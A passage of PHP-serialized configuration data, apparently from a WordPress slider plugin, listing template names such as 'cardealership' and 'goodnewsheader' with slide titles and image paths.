2\";s:3:\"img\";s:23:\"imagegallery/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"imagegallery/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"imagegallery/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:23:\"imagegallery/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:23:\"imagegallery/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:23:\"imagegallery/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:23:\"imagegallery/slide8.jpg\";}}s:19:\"standard-wp-gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"standard-wp-gallery/slide1.jpg\";}}s:21:\"clean-news-post-based\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"clean-news-post-based/slide1.jpg\";}}s:21:\"interactivewhiteboard\";a:8:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"interactivewhiteboard/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"interactivewhiteboard/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"interactivewhiteboard/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"interactivewhiteboard/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:32:\"interactivewhiteboard/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:32:\"interactivewhiteboard/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:32:\"interactivewhiteboard/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:32:\"interactivewhiteboard/slide8.jpg\";}}s:10:\"innovation\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"innovation/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"innovation/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"innovation/slide3.jpg\";}}s:24:\"dark-fullsite-block-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"dark-fullsite-block-menu/slide1.jpg\";}}s:21:\"dark-fullsite-block-1\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"dark-fullsite-block-1/slide1.jpg\";}}s:27:\"dark-fullsite-block-2-about\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"dark-fullsite-block-2-about/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:38:\"dark-fullsite-block-2-about/slide2.jpg\";}}s:30:\"dark-fullsite-block-3-services\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:41:\"dark-fullsite-block-3-services/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:41:\"dark-fullsite-block-3-services/slide2.jpg\";}}s:30:\"dark-fullsite-block-4-products\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide5.jpg\";}}s:34:\"dark-fullsite-block-5-testimonials\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:45:\"dark-fullsite-block-5-testimonials/slide1.jpg\";}}s:29:\"dark-fullsite-block-6-callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:40:\"dark-fullsite-block-6-callout/slide1.jpg\";}}s:28:\"dark-fullsite-block-7-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:39:\"dark-fullsite-block-7-footer/slide1.jpg\";}}s:19:\"fullsite-block-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"fullsite-block-menu/slide1.jpg\";}}s:15:\"fullsite-block1\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"fullsite-block1/slide1.jpg\";}}s:22:\"fullsite-block-2-about\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"fullsite-block-2-about/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"fullsite-block-2-about/slide2.jpg\";}}s:25:\"fullsite-block-3-services\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"fullsite-block-3-services/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"fullsite-block-3-services/slide2.jpg\";}}s:25:\"fullsite-block-4-products\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide5.jpg\";}}s:29:\"fullsite-block-5-testimonials\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:40:\"fullsite-block-5-testimonials/slide1.jpg\";}}s:24:\"fullsite-block-6-callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"fullsite-block-6-callout/slide1.jpg\";}}s:23:\"fullsite-block-7-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"fullsite-block-7-footer/slide1.jpg\";}}s:11:\"techjournal\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"techjournal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"techjournal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"techjournal/slide3.jpg\";}}s:13:\"cardealership\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"cardealership/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"cardealership/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"cardealership/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:24:\"cardealership/slide4.jpg\";}}s:14:\"fullscreenmenu\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"fullscreenmenu/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"fullscreenmenu/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"fullscreenmenu/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:25:\"fullscreenmenu/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:25:\"fullscreenmenu/slide5.jpg\";}}s:17:\"creativefrontpage\";a:8:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"creativefrontpage/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"creativefrontpage/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"creativefrontpage/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"creativefrontpage/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:28:\"creativefrontpage/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:28:\"creativefrontpage/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:28:\"creativefrontpage/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:28:\"creativefrontpage/slide8.jpg\";}}s:19:\"websitebuilder-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"websitebuilder-menu/slide1.jpg\";}}s:19:\"websitebuilder-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"websitebuilder-hero/slide1.jpg\";}}s:22:\"websitebuilder-clients\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"websitebuilder-clients/slide1.jpg\";}}s:23:\"websitebuilder-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"websitebuilder-services/slide1.jpg\";}}s:23:\"websitebuilder-discover\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"websitebuilder-discover/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"websitebuilder-discover/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"websitebuilder-discover/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"websitebuilder-discover/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:34:\"websitebuilder-discover/slide5.jpg\";}}s:21:\"websitebuilder-slider\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"websitebuilder-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"websitebuilder-slider/slide2.jpg\";}}s:27:\"websitebuilder-calltoaction\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"websitebuilder-calltoaction/slide1.jpg\";}}s:21:\"websitebuilder-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"websitebuilder-footer/slide1.jpg\";}}s:13:\"focusparallax\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"focusparallax/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"focusparallax/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"focusparallax/slide3.jpg\";}}s:7:\"duotone\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"duotone/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"duotone/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"duotone/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:18:\"duotone/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:18:\"duotone/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:18:\"duotone/slide6.jpg\";}}s:6:\"r_menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:17:\"r_menu/slide1.jpg\";}}s:5:\"rhero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:17:\"r_hero/slide1.jpg\";}}s:7:\"r_about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"r_about/slide1.jpg\";}}s:10:\"r_products\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"r_products/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"r_products/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"r_products/slide3.jpg\";}}s:6:\"r_info\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:17:\"r_info/slide1.jpg\";}}s:17:\"inspirationheader\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"inspirationheader/slide1.jpg\";}}s:13:\"magazineposts\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"magazineposts/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"magazineposts/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"magazineposts/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:24:\"magazineposts/slide4.jpg\";}}s:17:\"explorationheader\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"explorationheader/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"explorationheader/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"explorationheader/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"explorationheader/slide4.jpg\";}}s:16:\"typewritereffect\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"typewritereffect/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"typewritereffect/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"typewritereffect/slide3.jpg\";}}s:15:\"blendmodeheader\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"blendmodeheader/slide1.jpg\";}}s:17:\"themeplicity_menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"themeplicity_menu/slide1.jpg\";}}s:19:\"themeplicity_header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"themeplicity_header/slide1.jpg\";}}s:18:\"themeplicity_offer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"themeplicity_offer/slide1.jpg\";}}s:21:\"themeplicity_whatwedo\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"themeplicity_whatwedo/slide1.jpg\";}}s:21:\"themeplicity_projects\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"themeplicity_projects/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"themeplicity_projects/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"themeplicity_projects/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"themeplicity_projects/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:32:\"themeplicity_projects/slide5.jpg\";s:3:\"img\";s:7:\"Slide 5\";}}s:23:\"themeplicity_whatsgreat\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"themeplicity_whatsgreat/slide1.jpg\";}}s:19:\"themeplicity_tables\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"themeplicity_tables/slide1.jpg\";}}s:24:\"themeplicity_contactform\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"themeplicity_contactform/slide1.jpg\";}}s:19:\"themeplicity_footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"themeplicity_footer/slide1.jpg\";}}s:17:\"NiceAndClean_Menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"NiceAndClean_Menu/slide1.jpg\";}}s:19:\"NiceAndClean_Header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"NiceAndClean_Header/slide1.jpg\";}}s:21:\"NiceAndClean_Services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"NiceAndClean_Services/slide1.jpg\";}}s:18:\"NiceAndClean_About\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"NiceAndClean_About/slide1.jpg\";}}s:18:\"niceandclean_video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"niceandclean_video/slide1.jpg\";}}s:23:\"niceandclean_highlights\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"niceandclean_highlights/slide1.jpg\";}}s:21:\"NiceAndClean_Projects\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide5.jpg\";}}s:23:\"niceandclean_textblocks\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"niceandclean_textblocks/slide1.jpg\";}}s:20:\"niceandclean_callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"niceandclean_callout/slide1.jpg\";}}s:19:\"niceandclean_footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"niceandclean_footer/slide1.jpg\";}}s:3:\"80s\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:14:\"80s/slide1.jpg\";}}s:10:\"blurslider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"blurslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"blurslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"blurslider/slide3.jpg\";}}s:15:\"ComingSoonAddon\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"ComingSoonAddon/slide1.jpg\";}}s:9:\"snowaddon\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"snowaddon/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:20:\"snowaddon/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:20:\"snowaddon/slide3.jpg\";}}s:19:\"particle-effect-one\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"particle-effect-one/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"particle-effect-one/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"particle-effect-one/slide3.jpg\";}}s:19:\"particle-effect-two\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"particle-effect-two/slide1.jpg\";}}s:21:\"particle-effect-three\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"particle-effect-three/slide1.jpg\";}}s:15:\"portfolioviewer\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"portfolioviewer/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"portfolioviewer/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"portfolioviewer/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"portfolioviewer/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:26:\"portfolioviewer/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:26:\"portfolioviewer/slide6.jpg\";}}s:11:\"appshowcase\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"appshowcase/slide1.jpg\";}}s:13:\"gravitydesign\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"gravitydesign/slide1.jpg\";}}s:12:\"404errorpage\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"404errorpage/slide1.jpg\";}}s:15:\"carouselgallery\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"carouselgallery/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"carouselgallery/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"carouselgallery/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"carouselgallery/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:26:\"carouselgallery/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:26:\"carouselgallery/slide6.jpg\";}}s:9:\"filmstrip\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"filmstrip/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:20:\"filmstrip/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:20:\"filmstrip/slide3.jpg\";}}s:10:\"spaceopera\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"spaceopera/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"spaceopera/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"spaceopera/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:21:\"spaceopera/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:21:\"spaceopera/slide5.jpg\";}}s:12:\"websiteintro\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"websiteintro/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"websiteintro/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"websiteintro/slide3.jpg\";}}s:12:\"maskshowcase\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"maskshowcase/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"maskshowcase/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"maskshowcase/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"maskshowcase/slide4.jpg\";}}s:18:\"parallaxzoomslices\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"parallaxzoomslices/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"parallaxzoomslices/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"parallaxzoomslices/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"parallaxzoomslices/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:29:\"parallaxzoomslices/slide5.jpg\";}}s:20:\"doubleexposureeffect\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"doubleexposureeffect/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"doubleexposureeffect/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:31:\"doubleexposureeffect/slide3.jpg\";}}s:22:\"mountainparallaxheader\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"mountainparallaxheader/slide1.jpg\";}}s:12:\"goodnewsmenu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"goodnewsmenu/slide1.jpg\";}}s:14:\"goodnewsheader\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"goodnewsheader/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"goodnewsheader/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"goodnewsheader/slide3.jpg\";}}s:16:\"goodnewswhatshot\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"goodnewswhatshot/slide1.jpg\";}}s:16:\"goodnewsfeatured\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"goodnewsfeatured/slide1.jpg\";}}s:17:\"goodnewsspotlight\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"goodnewsspotlight/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"goodnewsspotlight/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"goodnewsspotlight/slide3.jpg\";}}s:16:\"goodnewscarousel\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"goodnewscarousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"goodnewscarousel/slide2.jpg\";}}s:15:\"goodnewscallout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"goodnewscallout/slide1.jpg\";}}s:14:\"goodnewsfooter\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 